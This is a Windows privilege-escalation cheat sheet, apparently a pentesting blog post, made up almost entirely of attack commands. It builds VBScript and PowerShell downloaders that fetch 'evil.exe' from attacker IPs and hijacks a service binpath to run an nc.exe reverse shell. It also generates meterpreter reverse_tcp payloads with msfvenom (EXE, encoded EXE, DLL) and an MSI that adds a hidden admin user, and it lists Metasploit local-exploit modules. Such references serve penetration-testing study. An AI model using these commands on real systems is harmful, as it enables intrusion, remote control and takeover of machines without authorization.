Windows Privilege
#Creating a wget VB Script on Windows:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
//After you've created wget.vbs
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
#Powershell file transfer
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.5/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
//Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
#Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
whoami
net user "%username%"
net localgroup administrators
#Metasploit Web delivery
msf>use exploit/multi/script/web_delivery
msf>set payload windows/meterpreter/reverse_tcp
msf>set AutoRunScript post/windows/manage/migrate
msf>set LHOST <local IP>
msf>set LPORT <local port>
msf>set TARGET 2
msf>exploit
#Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
#Try metasploit exploit suggester
meterpreter>run post/multi/recon/local_exploit_suggester
#Winenum
https://github.com/mattiareggiani/WinEnum
#RDP File Sharing
apt-get install remmina
#Sensitive/Flag file
tree
dir /b /s secret.txt
#Run-as admin (Require creds) without UAC
Start > run > powershell.exe Start-Process powershell -Verb runas
#Insecure Service Permissions
accesschk.exe /accepteula -uwcqv "john" *
sc qc upnphost
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 10.11.0.169 1337 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc stop upnphost
sc start upnphost
Metasploit Module: msf >use exploit/windows/local/service_permissions
#Unquoted Service Paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
sc qc "Macro Expert"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > Macro.exe
Metasploit Module: msf > use exploit/windows/local/trusted_service_path
#Insecure File/Folder Permissions
icacls "C:\Program Files (x86)\Program Folder\A Subfolder"
Simply replacing “Executable.exe” file with a reverse shell payload and restarting the service will give us a meterpreter session with SYSTEM privileges.
#AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -f msi-nouac -p windows/adduser USER=eviladmin PASS=P4ssw0rd@ -o add_user.msi
msiexec /quiet /qn /i malicious.msi
Metasploit Module: msf > use exploit/windows/local/always_install_elevated
#Task Scheduler
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe
net start "Task Scheduler"
at 06:42 /interactive "C:\Documents and Settings\test\Local Settings\Temp\Payload.exe"
#DLL Hijacking
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.60 lport=8989 -f dll > hijackable.dll
Tip
Beroot (https://github.com/AlessandroZ/BeRoot)
Resources
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://www.techsuii.com/2017/11/27/windows-privilege-escalation-cheat-sheet/?fbclid=IwAR3yVsVdOnoJmOT-L8tY3aBde5comGBthSAwO7LGYil-8IHMWRi1W03V40g
Tip
https://github.com/pentestmonkey/windows-privesc-check
https://github.com/SecWiki/windows-kernel-exploits
ไม่มีความคิดเห็น:
แสดงความคิดเห็น